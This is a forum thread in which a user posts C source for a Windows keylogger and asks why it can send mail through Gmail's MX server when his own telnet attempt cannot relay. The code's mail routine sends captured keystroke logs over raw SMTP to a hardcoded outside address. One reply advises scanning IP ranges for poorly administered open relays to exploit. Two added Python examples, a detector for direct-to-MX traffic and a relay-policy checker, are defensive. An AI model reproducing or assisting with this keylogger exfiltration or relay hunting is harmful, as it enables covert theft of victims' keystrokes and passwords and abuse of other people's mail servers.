mail relaying using SMTP server


Post by the_gr8_rules »

Hello all,
Please clarify the concept for me.

I've a code written in 'C' which is actually a keylogger which can send the data to a remote machine.
It has win32 API and socket programming.
Now in the code the SMTP server has to be specified. Suppose I'm specifying that of gmail.com (MX: mail exchange server);
the code works fine and sends the mail to my gmail account.

Now the question is... if I telnet to the same SMTP server on port number 25, it doesn't allow me mail relaying. Why so?

Code:

#define cmailserver "gmail-smtp-in.l.google.com"
.....
.....


strcpy(line,"helo me.somepalace.com\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"MAIL FROM:<");
     strncat(line,emailfrom,strlen(emailfrom));
     strncat(line,">\n",3);
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"RCPT TO:<");
     strncat(line,emailto,strlen(emailto));
     strncat(line,">\n",3);
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"DATA\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     sleep(waittime);
     strcpy(line,"To:");
     strcat(line,emailto);
     strcat(line,"\n");
     strcat(line,"From:");
     strcat(line,emailfrom);
     strcat(line,"\n");
     strcat(line,"Subject:");
     strcat(line,emailsubject);

regards


Post by bad_brain »

Code:

220 mx.gmail.com ESMTP 36sm10586055huc
ehlo mx.gmail.com
250-mx.gmail.com at your service, [87.xxx.xx.xxx]
250-SIZE 20971520
250-8BITMIME
250-STARTTLS
250 ENHANCEDSTATUSCODES
MAIL FROM xxxxx@gmail.com
530 5.7.0 Must issue a STARTTLS command first 36sm10586055huc

no SMTP AUTH option, so it's not possible to send a mail without having a certificate for using STARTTLS, check here for info on STARTTLS:
http://www.sendmail.org/~ca/email/starttls.html

seems gmail is simply not the right place for mail relays...:wink:

Post by the_gr8_rules »

bad_brain wrote:

Code:

220 mx.gmail.com ESMTP 36sm10586055huc
ehlo mx.gmail.com
250-mx.gmail.com at your service, [87.xxx.xx.xxx]
250-SIZE 20971520
250-8BITMIME
250-STARTTLS
250 ENHANCEDSTATUSCODES
MAIL FROM xxxxx@gmail.com
530 5.7.0 Must issue a STARTTLS command first 36sm10586055huc

no SMTP AUTH option, so it's not possible to send a mail without having a certificate for using STARTTLS, check here for info on STARTTLS:
http://www.sendmail.org/~ca/email/starttls.html

seems gmail is simply not the right place for mail relays...:wink:

but the code is sending mails using SMTP of gmail only... If you want I can post the whole code.

regards


Post by bad_brain »

well, I'm not a C guy, but you can post the part where the connection is made....the part you posted is just for sending the mail itself, so it would be useful to see how the connection is established.. :)


Post by the_gr8_rules »

Code:

#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>
#include <time.h>
int MailIt (char *mailserver, char *emailto, char *emailfrom, 
char *emailsubject, char *emailmessage);
#define BUFSIZE 800
#define waittime 500

#define cmailserver "gmail-smtp-in.l.google.com"
#define cemailto "xyz@gmail.com"
#define cemailfrom "abc@gmail.com"
#define LogLength 100
........
........ (key capturing activities here...
........
// now the socket programming code...

int MailIt (char *mailserver, char *emailto, char *emailfrom, 
char *emailsubject, char *emailmessage) {
    SOCKET sockfd;
    WSADATA wsaData;
    FILE *smtpfile;
    
    #define bufsize 300
    int bytes_sent;   /* Sock FD */
    int err;
    struct hostent *host;   /* info from gethostbyname */
    struct sockaddr_in dest_addr;   /* Host Address */
    char line[1000];
    char *Rec_Buf = (char*) malloc(bufsize+1);
    smtpfile=fopen(SMTPLog,"a+");
    if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
      fputs("WSAStartup failed",smtpfile);
      WSACleanup();
      return -1;
    }
    if ( (host=gethostbyname(mailserver)) == NULL) {
       perror("gethostbyname");
       exit(1);
    }
    memset(&dest_addr,0,sizeof(dest_addr));
    memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);

     /* Prepare dest_addr */
     dest_addr.sin_family= host->h_addrtype;  /* AF_INET from gethostbyname */
     dest_addr.sin_port= htons(25); /* PORT defined above */

     /* Get socket */

     if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
        perror("socket");
        exit(1);
        }
     /* Connect !*/
     fputs("Connecting....\n",smtpfile);
 
    if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
        perror("connect");
        exit(1);
        }
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"helo me.somepalace.com\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"MAIL FROM:<");
     strncat(line,emailfrom,strlen(emailfrom));
     strncat(line,">\n",3);
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"RCPT TO:<");
     strncat(line,emailto,strlen(emailto));
     strncat(line,">\n",3);
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"DATA\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     sleep(waittime);
     strcpy(line,"To:");
     strcat(line,emailto);
     strcat(line,"\n");
     strcat(line,"From:");
     strcat(line,emailfrom);
     strcat(line,"\n");
     strcat(line,"Subject:");
     strcat(line,emailsubject);
     strcat(line,"\n");
     strcat(line,emailmessage);
     strcat(line,"\r\n.\r\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     strcpy(line,"quit\n");
     fputs(line,smtpfile);
     bytes_sent=send(sockfd,line,strlen(line),0);
     sleep(waittime);
     err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
     fputs(Rec_Buf,smtpfile);
     fclose(smtpfile);                          
     #ifdef WIN32
     closesocket(sockfd);
     WSACleanup();
     #else
     close(sockfd);
     #endif
}
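
For defenders reading this thread: the code above speaks SMTP on port 25 straight from the machine it runs on to a recipient's MX host, where a normal mail client would submit through the site's own mail server. The following is an added example, not code from the thread, that flags such flows in a connection log; the log format, addresses and the mail-server allowlist are constructed assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Assumptions for this example: one internal range and one sanctioned mail host.
INTERNAL = ipaddress.ip_network("10.0.0.0/8")
MAIL_SERVERS = {"10.0.0.5"}
SMTP_PORTS = {25}

# Constructed sample log (key=value firewall records, documentation IPs).
LOG = """\
2006-09-07T10:00:01 proto=tcp src=10.0.0.5 dst=203.0.113.5 dport=25 action=allow
2006-09-07T10:00:09 proto=tcp src=10.0.0.23 dst=203.0.113.5 dport=25 action=allow
2006-09-07T10:00:12 proto=tcp src=10.0.0.23 dst=10.0.0.5 dport=25 action=allow
2006-09-07T10:01:40 proto=tcp src=10.0.0.41 dst=198.51.100.9 dport=443 action=allow
2006-09-07T10:05:09 proto=tcp src=10.0.0.23 dst=203.0.113.5 dport=25 action=allow
malformed line without fields
"""

FIELD = re.compile(r"(\w+)=(\S+)")

def direct_to_mx(log_text):
    """Return {src: {"count": n, "dsts": {...}}} for internal hosts that
    open SMTP connections to external servers without being a mail server."""
    hits = defaultdict(lambda: {"count": 0, "dsts": set()})
    for raw in log_text.splitlines():
        fields = dict(FIELD.findall(raw))
        try:
            src = ipaddress.ip_address(fields["src"])
            dst = ipaddress.ip_address(fields["dst"])
            dport = int(fields["dport"])
        except (KeyError, ValueError):
            continue  # skip records that do not parse
        if fields.get("proto") != "tcp" or dport not in SMTP_PORTS:
            continue
        if src not in INTERNAL or dst in INTERNAL:
            continue  # only outbound flows leaving the internal range
        if str(src) in MAIL_SERVERS:
            continue  # the sanctioned relay is expected to talk to MX hosts
        hits[str(src)]["count"] += 1
        hits[str(src)]["dsts"].add(str(dst))
    return dict(hits)

if __name__ == "__main__":
    for host, info in direct_to_mx(LOG).items():
        print(host, info["count"], sorted(info["dsts"]))
```

Blocking outbound TCP/25 from everything except the sanctioned mail hosts turns the same rule into prevention rather than detection.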


review, and maybe the answer

Post by DNR »

review;

You are sending emails using a gmail server and gmail email address, most servers will process email for users of its network, gmail. Try using another email than gmail, it might be denied. This is to prevent spammers from relaying emails from their server.

Port 25 is the SMTP port, but more and more large companies secure the port to stop spam. No company wants its customers phished from its own network. Smart sysadmins will hide the banners and set the simple rule of only allowing valid users of its network to relay mail. Since you are Mail from and Rcpt to a gmail account, you might have found the inherent flaw of weak rulesets.

#define cmailserver "gmail-smtp-in.l.google.com"
#define cemailto "xyz@gmail.com"
#define cemailfrom "abc@gmail.com"

As far as not being able to telnet to the port 25, its rulesets may not allow an IP outside the network's IP range to connect. Or you are trying to send email to/from a non-gmail account.

You need to find a smaller, poorly administrated server. IP Range Scanning for port 25 can get you a list, Sam Spade can help you check for the relaying exploit.
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.
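
The distinction the replies above are circling, delivery to a server's own domain versus relaying to someone else's, can be written down as the decision a mail server makes at RCPT TO. This is an added example, not code from the thread or from any mail server; the `RelayPolicy` class, its reply texts and the sample domains and networks are constructed, and it shows a correctly scoped policy beside a misconfigured one.

```python
import ipaddress
from dataclasses import dataclass

@dataclass
class RelayPolicy:
    local_domains: set   # domains this server is the final destination for
    trusted_nets: list   # client networks allowed to relay without SMTP AUTH

    def decide(self, client_ip, rcpt, authenticated=False):
        """Return the (code, text) reply to one RCPT TO command."""
        if rcpt.count("@") != 1:
            return 501, "5.1.3 bad recipient address syntax"
        domain = rcpt.rsplit("@", 1)[1].lower().rstrip(".")
        if domain in self.local_domains:
            # Inbound mail for our own users: accepted from anyone.
            return 250, "2.1.5 OK (local delivery, not a relay)"
        ip = ipaddress.ip_address(client_ip)
        if authenticated or any(ip in n for n in self.trusted_nets):
            return 250, "2.1.5 OK (relay for trusted client)"
        return 550, "5.7.1 relaying denied"

def is_open_relay(policy):
    """True if an unauthenticated outside client can reach a foreign domain."""
    code, _ = policy.decide("198.51.100.7", "someone@example.net")
    return code == 250

# Constructed sample policies (documentation addresses and domains).
HARDENED = RelayPolicy({"example.org"}, [ipaddress.ip_network("192.0.2.0/24")])
WEAK = RelayPolicy({"example.org"}, [ipaddress.ip_network("0.0.0.0/0")])

if __name__ == "__main__":
    outside = "198.51.100.7"
    print(HARDENED.decide(outside, "xyz@example.org"))   # local delivery
    print(HARDENED.decide(outside, "xyz@example.net"))   # relay attempt
    print("weak policy is an open relay:", is_open_relay(WEAK))
```

An administrator can run the same two questions against their own configuration: is the recipient domain one we host, and if not, is the client authenticated or inside a deliberately narrow trusted range.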